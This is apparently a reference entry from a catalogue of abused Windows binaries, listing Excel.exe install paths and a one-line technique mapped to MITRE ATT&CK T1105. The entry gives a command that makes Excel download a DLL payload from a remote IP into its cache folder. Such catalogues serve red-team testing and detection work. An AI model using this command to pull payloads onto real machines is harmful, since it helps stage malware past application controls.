Microsoft Office binary
Paths:
- C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe
- C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe
- C:\Program Files (x86)\Microsoft Office\Office16\Excel.exe
- C:\Program Files\Microsoft Office\Office16\Excel.exe
- C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Excel.exe
- C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Excel.exe
- C:\Program Files (x86)\Microsoft Office\Office15\Excel.exe
- C:\Program Files\Microsoft Office\Office15\Excel.exe
- C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Excel.exe
- C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Excel.exe
- C:\Program Files (x86)\Microsoft Office\Office14\Excel.exe
- C:\Program Files\Microsoft Office\Office14\Excel.exe
- C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe
- C:\Program Files\Microsoft Office\Office12\Excel.exe
- C:\Program Files\Microsoft Office\Office12\Excel.exe
Resources:
Download
Downloads payload from remote server
Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
Usecase: It will download a remote payload and place it in the cache folder
Privileges required: User
OS: Windows
MITRE ATT&CK®: T1105